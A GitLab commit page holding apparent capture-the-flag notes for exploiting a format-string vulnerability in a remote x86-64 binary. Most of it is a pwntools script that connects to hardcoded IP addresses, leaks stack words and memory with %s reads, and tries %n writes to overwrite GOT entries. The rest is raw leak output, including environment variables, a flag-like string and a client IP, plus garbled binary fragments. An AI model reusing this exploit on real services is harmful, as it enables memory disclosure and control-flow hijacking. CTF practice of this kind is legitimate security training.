Commit 19c60661 authored by Chris James's avatar Chris James

updated

parent ef0a1b01
Description:
Dr. Watson is often a foil to Sherlock in both appearance and personality, but he trusts
Sherlock too much, that’s the thing Sherlock exploited to fake his death!
No need to binary file!
nc 146.185.168.172 54515
nc 178.62.249.106 54515
7j 綠7DH5
\ No newline at end of file
H
\ No newline at end of file
0x400780 == return address from printf
0x4005a0 == puts == 0x601018 (690)
0x4005b0 == sym.imp.stack_chk_fail == 0x601020
0x4005c0 == printf == 0x601028 (800)
0x4005d0 == sym.imp.setvbuf == 0x601030 (0x7fca403dfe70)
0x4005e0 == scanf == 0x601038 (04d0)
0x4005f0 == entry0
0x4006da == main
what is 0x00600ff8? double check 0x00400574 instruction...
[1, 7f295eb12790, a, 0, 7f9c71806700, 7ffc1c0f7528, 100000000, 786c243830254141, 7ffdd8725c00, 1, 7ffe8fd2a250, 7fa75112c168, f0b2ff, 1, 4007cd, 7ffc73209efe, 0, 400780, 4005f0, 7ffec900b7c0, cf3ea354928d1f00, 400780, 7f530489f830, 1, 7ffdf7a94d68, 192301ca0, 4006da, 0, fba447396ac42bde, 4005f0, 7ffc8b0c2110]
['',
'',
'',
'\xf0\x05@',
'\xa0<\xc0\xe8\x01',
'',
'\x16\xba\x80\x07@',
'\x01',
'\x89\xc7\xe8\xf9\x97\x01',
'',
'1\xedI\x89\xd1^H\x89\xe2H\x83\xe4\xf0PTI\xc7\xc0\xf0\x07@']
1.7f18f00b9790.0.0.7f18f02dc700.7fffa4af1438.100000000.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.7fff00786c25.4f33ab934bda6900.400780.7f18efd13830.1.7fffa4af1438
.1.7fe1df072790.a.0.7fe1df295700.7ffc43a65818.100000000.6c252e6e6c243225.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.2e786c252e78.4005f0.7ffc43a65810.
libc.so.6
__isoc99_scanf
puts
__stack_chk_fail
stdin
printf
stdout
setvbuf
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
[0, 0, fd8fe31cbd163a04, 60586f26ffe7db, 0, 0, 0, 7ffc74edca98, 7f497a991168, 7f60c91e67cb, 0, 0, 4005f0, 7ffc038cd1f0, 0, 40061a, 7ffd5432fb48, 1c, 1, 7ffc054fff00, 0, 7ffc2f842f26, 7ffee732ff68, 7fff3ac42f7e, 7ffe41428f89, 7ffeda5f7f9b, 7ffefb56ffa6, 0, 21, 7ffcd8ba5000, 10, f8bfbff]
[&/.r\xfd\x7f, , \xeb\xd3\x0f\x1f, \x01, \x1c, Dong_a99e4272325430e3ea60e82e28cd03de, PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin, HOSTNAME=d15784a5870b, TERM=xterm, user=dongfangroad, HOME=/root, REMOTE_HOST=70.171.63.47, \x7fELF\x02\x01\x01]
[6, 1000, 11, 64, 3, 400040, 4, 38, 5, 9, 7, 7ff770dcf000, 8, 0, 9, 4005f0, b, 3e8, c, 3e8, d, 3e8, e, 3e8, 17, 0, 19, 7ffefdd551d9, 1a, 0, 1f, 7ffd220a3fbf]
[\x7fELF\x02\x01\x01, n\xe2\x7f\xe8r\x1c:\x93\xc6\xf4~~%\x85\x984x86_64, /home/dongfangroad/Dong_a99e4272325430e3ea60e82e28cd03de]
#!/usr/bin/env python2
from pwn import *
from binascii import hexlify,unhexlify
from IPython import embed
ips = ["146.185.168.172", "178.62.249.106"]
port = 54515
def log(message, sev=0):
msg = ""
if sev == 0:
msg += "[INFO] - "
elif sev == 1:
msg += "[WARN] - "
elif sev == 2:
msg += "[CRIT] - "
else:
msg += "\t"
msg += str(message)
print(msg.rstrip())
def leak(startAddr):
try:
p = remote(ips[0], port)
except Exception as e:
return -1
log(p.readline())
#p.sendline("%lx." * 22 + "A%s." + "%lx" * 2)
log("Leaking bytes from {}:".format(hex(startAddr)))
p.sendline("AA.%9$s." + p64(startAddr))
output = p.read()
log("Output: {}".format(output))
chunks = output.split(".")
log("Bytes leaked: {}:\n\t{}".format(len(chunks[1]), chunks[1]), sev=1)
p.close()
return chunks[1]
def dumpData():
chunks = []
#edit these addresses to specify ranges of the binary to dump. trailing NULL bytes are lost....you have to re-add them when you join the files together.
start = 0x400e00
end = 0x401000
cursor = start
log("Starting Cursor: {}".format(hex(cursor)), sev=2)
while (cursor < end):
chunk = leak(cursor)
if chunk == -1:
break
chunks.append(chunk)
cursor += (len(chunk) + 1)
outFname = "output_{}-{}.bin".format(hex(start), hex(cursor))
with open(outFname, 'wb') as f:
f.write('\x00'.join(chunks))
log("Ending Cursor: {}".format(hex(cursor)), sev=2)
embed()
def patchBinary():
"lets patch the GOT so that main() gets called over and over"
mainAddr = 0x4006da
putsAddr = 0x601018
stack_chk_fail = 0x601020
try:
p = remote(ips[0], port)
except Exception as e:
return -1
log(p.readline())
#p.sendline("%2$lx.%2$s." + ("%lx." * 10))
#p.sendline("%22$lx")
#p.sendline("%lx." * 25)
#p.sendline("%2$ln." + "%lx." * 20)
#p.sendline("%20$n.%1$x")
#target = 0x601018
#target = 0x601060
target = 0x600e10
#p.sendline("AA%59lx." + "BB%13$n." + "%1687lx." + "D%14$hn." + "EE%14$s." + p64(target + 2) + p64(target))
p.sendline("AA%20$s")
sleep(0.1)
output = p.read()
log(output)
try:
log(p.read(), sev=2)
except:
pass
embed()
p.close()
def leakStack():
words = []
#stackWords = [2, 5, 6, 9, 11, 12, 16, 20, 23, 25, 30]
#stackWords = [39, 40, 41, 45, 48, 51, 53, 54, 55, 56, 57, 58, 61]
#stackWords = [75, 91, 95]
stackWords = [9]
#stackWords = [2, 5, 6, 9, 11, 12, 16, 20, 23]
#for i in range(1, 0x20):
for i in range(0xff):
try:
p = remote(ips[0], port)
except Exception as e:
return -1
log(p.readline())
#p.sendline("A%{}$lx.".format(str(i).zfill(2)))
#p.sendline("AA%{}$s.{}".format(str(i).zfill(2), chr(i)))
p.sendline("AAA%9$s.{}".format(chr(i)))
output = p.read()
log(output)
words.append(output)
embed()
def main():
#comment this out if you're not dumping slices of the binary
#dumpData()
#uncomment this for patching the binary/playing with basic format string primitive
#patchBinary()
leakStack()
if __name__ == "__main__":
main()
[1, 7fadfeaa7790, a, 0, 7f401f78e700, 7ffc94ff4868, 100000000, 2e786c2438302541, 7ffd608c3300, 1, 7fff55156660, 7fe277eb8168, f0b2ff, 1, 4007cd, 7fff7cdf512e, 0, 400780, 4005f0, 7fff5d9d5090, 251c0411fc141c00, 400780, 7fd7a6d4f830, 1, 7ffc0f13e9e8, 1ef46bca0, 4006da, 0, 19dca84e3971c174, 4005f0, 7ffeda5abc80]
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment